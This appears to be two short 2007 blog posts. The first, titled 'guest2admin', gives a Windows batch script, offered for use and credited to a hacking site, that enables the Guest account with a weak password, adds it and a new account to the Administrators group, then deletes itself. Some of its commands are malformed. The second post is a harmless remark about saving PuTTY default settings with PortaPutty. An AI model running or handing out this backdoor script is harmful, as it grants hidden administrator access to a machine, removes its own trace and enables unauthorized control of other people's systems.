20070413

guest2admin

echo off
title Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0

save in notepad as "guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


~ Cheers ~

from rahulhackingarticles

20070406

Save putty default settings

I hope there is an easier way to save the default settings for Putty. Rather than have to write 'Default Settings' in the Saved Sessions textfield, and click Save. By the way, I use PortaPutty. Because it stores saved sessions in a folder, not in the Windows Registry like what original Putty does. So you can store Putty on your thumbdrive.